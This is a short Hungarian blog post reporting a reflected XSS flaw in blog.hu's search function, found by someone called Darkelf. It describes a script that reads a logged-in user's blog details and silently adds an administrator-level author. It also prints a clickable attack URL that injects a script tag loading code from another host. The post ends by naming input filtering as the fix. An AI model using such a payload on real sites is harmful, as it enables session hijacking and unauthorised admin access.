Darkelf talált egy nem-perzisztens XSS hibát a blog.hu keresőmotorjában. Mint tudjuk, az ilyen jellegű hiányosságok alap esetben nem jelentenek komoly veszélyt egy oldalra nézve, bár pl. egy phishing akció lebonyolításához kiválóan használhatók. Darkelf viszont kicsit továbbgonolta a dolgot, és írt egy ügyes kis szkriptet, ami egy aktív sessionben futtatva kiolvas néhány alapvető információt a felhasználó blogjaiból, valamint felvesz egy úgy adminisztrátori jogosultságú szerzőt is. Az alábbi linket követve tesztelhető a cucc:
http://blog.hu/index.php?posts=15&sentence=OR&s="><script src=https://m.blog.hu/ez/eznemegy/xss.txt> </script>&x=11&y=13

A hiba a keresőkifejezés megfelelő szűrésével orvosolható!

Címkék: xss blog hu

süti beállítások módosítása